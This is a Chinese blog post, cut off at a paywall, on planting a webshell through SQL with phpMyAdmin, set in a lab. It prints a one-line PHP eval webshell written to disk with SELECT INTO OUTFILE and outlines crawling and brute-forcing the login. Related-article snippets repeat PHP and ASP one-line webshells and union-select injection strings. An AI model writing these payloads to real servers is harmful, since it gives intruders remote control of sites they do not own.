WEBSHELL姿势之SQL一句话

最新推荐文章于 2024-05-17 08:26:16 发布
最新推荐文章于 2024-05-17 08:26:16 发布
阅读量6k 收藏 4
点赞数 1
分类专栏: WEB安全 文章标签: WEBSHELL phpmyadmin 一句话木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/calmegm/article/details/49431007
版权

之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,或者通过改filename后缀实现。这次我们要实验的就是通过phpMyAdmin来实现。

一般来说要利用SQL来实现一句话,有如下几种情况:

1.存在sql注入,在没有字符处理时可直接写入一句话(如Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/shell.php');

2.利用phpMyAdmin写入一句话(前提登录phpMyAdmin)

3.其次利用注入登录应用系统,发现应用系统的其它漏洞,完成getshell。

0x00 实验环境

1.一个安装phpMyAdmin的windows环境

2.使用工具burpsuit(可使用其他相关工具替换)

0x01 发现phpMyAdmin

输入ip,我们发现应用是一个后台登录系统,使用burpsuit代理并将目标网站发送至spider进行网页爬取,在target中查看网站目录(适当调整fitler可显示多个目录)


0x02 暴力破解

我们访问目标网站http://10.1.1.1

最低0.47元/天 解锁文章
6um1n
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webshell一句
08-26
php,jsp,asp等脚本的常用一句webshell,然后用菜刀连接即可
JSP一句后门
10-31
JSP一句后门 JSP一句后门是指在Java Server Pages(JSP)中使用的一种后门技术,该技术允许攻击者在服务器上写入恶意文件,从而控制服务器的行为。 知识点1: JSP是什么? JSP全名为Java Server Pages,是一种...
一句sql练习
qq_42540547的博客
03-03 136
1.Employee 表包含所有员工信息,每个员工有其对应的 Id, salary 和 department Id。 ±—±------±-------±-------------+ | Id | Name | Salary | DepartmentId | ±—±------±-------±-------------+ | 1 | Joe | 70000 | 1 ...
一条简单的SQL语句
像豆芽一样优秀
04-08 264
深入浅出索引(上)一、唠叨几句二、聚簇索引三、B+树 一、唠叨几句 某个群里发现的一个问题:表t的id字段是主键索引时,select * from t where id=1 与 select * from t where id=10000000的区别,直观看过去应该是前者的速度比后者快一点,为了验证我的想法,马上去一个上亿量数据的表里去查询了一番。果不其然,一个0.00008s,一个0.0010...
sql写shell原理_sql注入写入shell的条件
最新发布
2401_84281655的博客
05-17 680
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要写入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可写权限即secure_file_priv = ''配置为空原因是--os-shell参数写入shell使用的是select xx into outfile而secure_file_priv此配置。
关于SQL 语句。
iteye_994的博客
05-28 95
java 学了接近十周了吧。终于学到了SQL语句。相对于java这门语言,SQL语句可是简单到不像了。可就是这么简单的语言,最容易编译出错。因为我们是在java编译器里编写SQL语句,很容易会出现语句正确但是程序却跑不好的情况。下面我来好好介绍一下吧! 链接数据库不难,只要通过以下几个语句即可。 //加载驱动 Class.forName("com.mysql.jdbc.Driver")...
我常用经典SQL语句[就先写一句吧]
冷枫@CSDN
05-10 1638
select x1.*,x2.* from company x1,companyvouch x2 where x1.id = x2.companyid order by x2.id desc
如何通过SQL语句写入webshell
weixin_33720956的博客
07-03 1844
在web应用场景下,经常会碰到SQL注入场景,如页面能够执行SQL语句,那么可能会有直接通过SQL语句写入webshell的风险,常见的phpmyadmin环境下,通过几个语句可以轻松将一句木马写入到服务器文件,如下: use test; //进入数据库create table test (shell text not null); //创建表insert into test (shell)...
过安全狗的aspx一句webshell
02-08
过安全狗的aspx一句webshell 纯CS模式,经典免杀
ACCESS导一句webshell1
08-08
在本文中,我们将探讨一种利用ACCESS数据库导出功能来植入Webshell的方法,这种方法被称为"ACCESS导一句webshell1"。Webshell是一种后门程序,常用于远程控制被黑网站,执行恶意操作。此技术主要针对使用ACCESS...
Aspx一句网马Webshell.rar
01-07
ASPX一句网马,也称为Webshell,是黑客在成功入侵Web服务器后,为了长期控制服务器而上传的一种小型脚本程序。它通常是一段简短的ASP.NET代码,能够执行命令、读取、写入或删除文件,甚至控制系统。这个压缩包文件...
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
渗透之——SQL语句生成一句
冰河的专栏
12-27 3514
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85296880 1、SQLServer执行SQL语句生成一句 select '&lt;%execute request("a")%&gt;' into [NB_master] in 'd:\wwwroot\x.asp;a.xls''excel 8.0;' from NB_m...
搬砖笔记-SQL注入手写shell的语句
WM_NNXX的博客
08-25 2444
SQL注入写shell的几种语句 需要绝对路径和权限。 union select 后写入 lines terminated by 写入 lines starting by 写入 fields terminated by 写入 COLUMNS terminated by 写入 union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,’<?php p
SQL注入写入一句php(outfile方式)&中国菜刀连接
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 3630
通过SQL注入漏洞上传一句木马前言一、先读取数据库路径二、写入一句木马1.关闭windows系统防护三、上菜刀 前言 具体sql注入漏洞和一句木马原理以及sql语句这里不做讲解,直接开门见山 以dvwa的low级别为例 一、先读取数据库路径 1' union select @@datadir,2# 二、写入一句木马 1' union select 1,"<?php eval($_POST[wang]);?>" into outfile 'C:/phpStudy/PHPTutorial
42、利用sql语句写入shell
weixin_41489908的博客
02-12 1789
目标ip:192.168.52.143 一、御剑扫描该地址 获取到重要信息: 1、网站的绝对路径 2、phpmyadmin,并且是默认账号密码:root 二、登录数据口后台,写入一句木马 select ‘<?php eval($_POST[x]);?>’ into outfile ‘c:/phpstudy/www/xx.php’ 执行的时候报错 解决方法: 1、设置slow_...
利用sql语句写shell脚本(Solaris下以前时间的表示)
conger3400的博客
02-22 136
cd /export/home/oracle/hnsd_baksqlplus / as sysdba<set head offset feedback offspool rmfile.shselect 'rm -rf hn...
sql注入与一句木马
告白的博客
07-09 3234
0x00 sql注入之一句木马 首先介绍一下一句木马: 一句木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。 常见脚本的一句木马: php的一句木马: <?php @eval($_POST['pass']);?> asp的一句是: <%eval request (“pass”)%> aspx的一句是: <%@ Page
另类sql注入拿webshell
李熠专用博客_白帽子一枚,人称低危终结者
12-08 4820
sql注入,想必大家都知道,本文教大家如果通过常规方法不行的前提下,拿下网站shell。 凡是以http://www.xxx.com/xxx.asp?id=1类似名称都可以通过著名的and 1=1 和and 1=2来检测是否存在漏洞。 当时我拿的一个网站(为了安全考虑,此时不举出该网站的名字),就以xxx代替,见谅。 我用and 1=1 and 1=2试了一下,发现该网站存在注入漏洞,并且是
sql注入写入webshell
06-28
要利用SQL注入写入Webshell,攻击者需要找到一个易受攻击的应用程序,并利用应用程序中存在的漏洞注入恶意的SQL代码。一旦注入成功,攻击者可以使用SQL语句来创建一个Webshell文件,并将其写入服务器上的某个目录中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值